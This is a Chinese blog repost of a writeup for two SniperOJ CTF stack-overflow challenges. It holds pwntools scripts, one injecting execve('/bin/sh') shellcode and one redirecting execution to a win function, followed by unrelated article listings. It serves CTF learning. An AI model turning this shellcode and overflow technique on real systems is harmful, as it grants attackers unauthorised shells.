Sniper OJ部分writeup

最新推荐文章于 2024-10-14 23:40:45 发布
最新推荐文章于 2024-10-14 23:40:45 发布
阅读量123 收藏
点赞数
文章标签: python
原文链接:http://www.cnblogs.com/elvirangel/p/6708397.html
版权

0x00 shellcode pwn

因为题目直接有源码,我就不拖进IDA了,直接看代码

这是一个典型的栈溢出,我们只需要构造shellcode获得/bin/sh权限就可以得到flag.下面是所用脚本。

 

from pwn import *

from sys import *

reload(sys)

sys.setdefaultencoding('gb18030')

shell_code = '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'

conn = remote('123.207.114.37',30001) 

addr = conn.recvuntil(']')

add = int(addr[-13:-1],16)               

shellcode_add = p64(add + 24 + 8)

v = 24*"a" + shellcode_add + shell_code

conn.send(v+'\n')

conn.interactive()

cd

运行脚本,得到flag

0x01 bof pwn

源码如下

这是一个更简单的栈溢出,只要构造溢出调用bingo函数就能得到flag

把源文件拖进ida,发现bingo函数位于地址0x0000000000400616处

于是编写脚本

#!/usr/bin/python
from pwn import *
#context.log_level = 'DEBUG'
r = remote('123.207.114.37',30000)
r.send('A'*24+'\x16\x06\x40\x00\x00\x00\x00\x00') 
r.interactive()

得到flag

 

转载于:https://www.cnblogs.com/elvirangel/p/6708397.html

weixin_30692143
关注
SniperOJ pwn100-bof writeup
0_Re5et
04-27 2483
在大佬的指导下拿到了人生中第一个pwn flag。感觉pwn真的帅的飞天了!在此简单记录一下思路。因为还没有补相关的基础知识,哪里不对的话还请各位大佬指出~比心~1. 首先查看文件版本命令 file filename 可以看到程序是64bit,linux平台下的 在这里补充一下查看本机操作系统位数的命令: getconf LONG-BIT 然后就去对应的系统下就ok了2. 查看源代码或运
SniperOJ WEB writeup
Ni9htMar3的博客
05-05 6625
WEB SniperOJ-Web-Browser md5-vs-injection php-weak-type as fast as you can very-hard-injection inject-again 图书管理系统
SniperOJ Web by Assassin
Assassin
09-02 3142
md5-vs-injection好久不做题了 肯定是文件泄露了,猜测容易得到index.phps泄露文件,然后看一下是啥<?php $flag = 'SniperOJ{********************}'; if(isset($_POST['password'])){ $current_password = "QNKCDZO"; $password
SniperOJ-CTF练习-web
Risk2S的小博客
07-31 1269
PHP weak type 查看源码 I love vim~ 那就是vim的备份文件了 访问index.php~ 得到源码 <?php $flag = 'SniperOJ{********************}'; if(isset($_POST['password'])){ $current_password = "QNKCDZO";
Gigabyte技嘉G1.Sniper Z87主板BIOS驱动程序下载
03-16
标题中的“Gigabyte技嘉G1.Sniper Z87主板BIOS驱动程序下载”指的是技嘉科技(Gigabyte)公司生产的G1.Sniper Z87主板的BIOS(基本输入输出系统)驱动更新。BIOS是计算机硬件与操作系统之间的一个关键软件层,它负责...
SNIPER
10-24
如果没有扩展名,那么它可能是一个压缩文件的一部分,包含了SNIPER字体的多个文件,或者是其他相关资源如示例文档、许可证文件等。 在使用或研究SNIPER字体时,我们需要考虑以下几点: 1. **安装字体**:在Windows...
Gigabyte技嘉G1.Sniper B5主板BIOS驱动程序下载
03-20
支持Intel 第4代Core处理器 技嘉超耐久 4 Plus 技术 技嘉 Hybrid Digital 供电设计 技嘉 UEFI DualBIOS 技嘉 AMP-UP Audio 技术 独家可更换 OP-AMP 芯片 Nichicon高阶音效专用电容 LED 酷炫光阻隔讯号干扰设计 极致...
SNIPER JR'.rar_Sniper Indicator_binary Indicator_binary sniper_e
07-15
《狙击手JR(SNIPER JR):二元期权交易指标详解》 在金融交易领域,尤其是二元期权交易中,技术分析工具扮演着至关重要的角色。本文将深入探讨名为"Sniper JR"的二元期权狙击指标,帮助交易者理解和运用这一策略,...
技嘉G1.Sniper Z97(rev.1.x)驱动程序下载
03-19
支持 Intel 第4代/第5代Core 处理器 创新3D音效芯片 魔音音效技术及可更换式功放设计 搭配LED灯条的低噪声独立PCB切割区块 镀金魔音USB接口 镀金视频接口和音频接口 尼吉康高品质音频专用电容 杀手E2200游戏专用网卡...
使用Sniper来测试Http站点
chuangwei7028的博客
12-16 378
Sniper是一个功能强大、高性能的HTTP负载工具,采用Golang编写。利用协程并发优势,实现海量并发、超低内存占用、丰富图表展示。是测试、分析、优化服务端性能的绝佳助手! 功能 GET / POST keep-alive模式 https ...
Efficient Multi-Scale Training训练代码解析
CUBE的博客
01-24 1004
Efficient Multi-Scale Training训练代码解析 def parser() 使用argparse模块实现命令行解析[1] 导入argparse模块 创建解析器对象ArgumentParser,可添加参数 add_argument(),指定程序需要接受的命令参数 add_argument()定位参数(必选): parser.add_argument(“echo”, h...
SNIPER 获取固定参数并创建模块
CUBE的博客
01-25 337
Get list of fixed parameters sym_inst = eval('{}.{}'.format(config.symbol, config.symbol))(n_proposals=400, momentum=args.momentum) sym = sym_inst.get_symbol_rcnn(config) fixed_param_names...
【论文笔记】:SNIPER: Efficient Multi-Scale Training
Activewaste
07-15 628
&Title: SNIPER: Efficient Multi-Scale Training SNIPER- Efficient Multi-Scale Training(中文翻译) &Summary 目前的目标检测架构都是对输入图像的所有像素进行操作,从而产生proposals等,当采用多尺寸的图像金字塔时,所需的存储空间很大,在训练时,单一GPU上能训练的图像数量很小(取决于G...
论文笔记-SNIPER:Efficient Multi-Scale Training
Liven_Zhu的博客
07-30 3147
1. 介绍 目前的目标检测架构都是对输入图像的所有像素进行操作,从而产生proposals等,当采用多尺寸的图像金字塔时,所需的存储空间很大,在训练时,单一GPU上能训练的图像数量很小(取决于GPU的显存和图像的分辨率),这样就造成了batch size很小,从而使训练时间很长。因此作者提出了一种新的训练思路:先粗略定位一下正负例所在的区域,然后以该区域内的像素信息作为卷积网络的输入,再精确检测...
SNIPER MNIterator代码解析
CUBE的博客
01-25 618
main_train.py train_iter = MNIteratorE2E(roidb=roidb, config=config, batch_size=batch_size, nGPUs=nGPUs, threads=config.TRAIN.NUM_THREAD, pad_rois_to=400) SNIPER/lib/iterators MNIteratorE2E class...
【人工智能学习之PaddleOCR快速上手】
Jiagym的博客
10-12 1384
在配置文件中,可以设置组建模型、优化器、损失函数、模型前后处理的参数,PaddleOCR从配置文件中读取到这些参数,进而组建出完整的训练流程,完成模型训练,在需要对模型进行优化的时,可以通过修改配置文件中的参数完成配置,使用简单且方便修改。而 L2 正则化中,添加正则化项的目的在于减少参数平方的总和。准确检测的标准是检测框与标注框的IOU大于某个阈值,正确识别的检测框中的文本与标注的文本相同。如果缺少带标注的数据,或者不想投入研发成本,建议直接调用开放的API,开放的API覆盖了目前比较常见的一些垂类。
pandas中数据子集的获取
最新发布
weixin_43597208的博客
10-14 460
通常,在pandas模块中实现数据框子集的获取可以使用iloc、loc和ix三种方法,这三种方法既可以对数据行进行筛选,也可以实现变量的筛选,它们的语法可以表示成[rows_select,cols_select]。iloc只能通过行号和列号进行数据的筛选,可以将iloc中的i理解为’integer’,即只能向[rows_select,cols_select]指定整数列表该索引方式与数组的索引方式类似,都是从0开始,可以间隔取号,对于切片仍然无法取到上限。
抓包工具sniper
05-12
Sniper是一款专业的网络抓包工具,它可以监控和分析网络数据包,帮助开发人员和网络管理员诊断和解决网络问题。Sniper支持多种协议(如TCP、UDP、HTTP等)的抓取,并提供了强大的过滤和分析功能,以便用户更好地理解和分析网络流量。 通过Sniper,用户可以实时查看数据包的详细信息,包括源地址、目标地址、协议类型、数据长度、数据内容等。同时,用户还可以通过设置过滤条件,只捕获特定类型的数据包,并根据需要进行数据包重组和重放。 Sniper也支持导出捕获的数据包到PCAP文件格式,以便进一步离线分析和处理。除此之外,Sniper还提供了多种插件和扩展,用户可以根据需要进行自定义配置和扩展功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值